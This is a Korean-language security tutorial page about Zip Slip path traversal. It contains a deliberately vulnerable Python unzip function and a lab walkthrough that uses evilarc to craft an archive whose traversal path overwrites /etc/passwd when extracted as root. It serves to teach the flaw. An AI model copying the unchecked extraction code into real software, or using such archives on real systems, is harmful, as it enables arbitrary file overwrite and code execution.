ZIP Slip

ZIP Slip Attack은 압축 파일을 압축 해제하는 과정에서

압축된 파일의 이름을 적절하게 검증하지 않는다면 Path Traversal 공격이 가능한 취약점입니다.

공격을 통해서 기존에 존재하는 서버의 파일을 덮어쓰거나,

악성 코드를 올려둬서 실행시키게끔 하는 DLL Hijacking 공격 시나리오로 이어질 수 있습니다.

Practice

unzip과 7z 등의 상용 압축 해제 프로그램의 경우 보안 업데이트가 되기 때문에

CVE에 대한 패치로 실습이 어렵기 때문에

압축을 해제하는 파이썬 프로그램을 먼저 제작합니다.

import zipfile
import os

def extract_zip(zip_path, extract_to):
    with zipfile.ZipFile(zip_path, 'r') as zip_ref:
        for file in zip_ref.namelist():
            file_path = os.path.join(extract_to, file)
            os.makedirs(os.path.dirname(file_path), exist_ok=True)
            with open(file_path, 'wb') as f:
                f.write(zip_ref.read(file))

extract_zip('evil.zip', '.')

이후 evilarc를 통해서 경로 이동 문자를 포함한 압축 파일을 생성한 뒤

압축 해제 프로그램을 통해 압축을 해제합니다.

┌──(root㉿kali)-[~/Pentest/Machine]
└─# python2 evilarc.py passwd --depth 5 --path '/etc/' --os unix 
Creating evil.zip containing ../../../../..//etc/passwd
                                                                                                                                                                                 
┌──(root㉿kali)-[~/Pentest/Machine]
└─# python3 unzip.py evil.zip                                   
                                                                                                                                                                                 
┌──(root㉿kali)-[~/Pentest/Machine]
└─# cat /etc/passwd
ZIP Slip Vulneabliity Test

References

PreviousSOP / CORS NextActive Directory

Last updated 4 months ago

Was this helpful?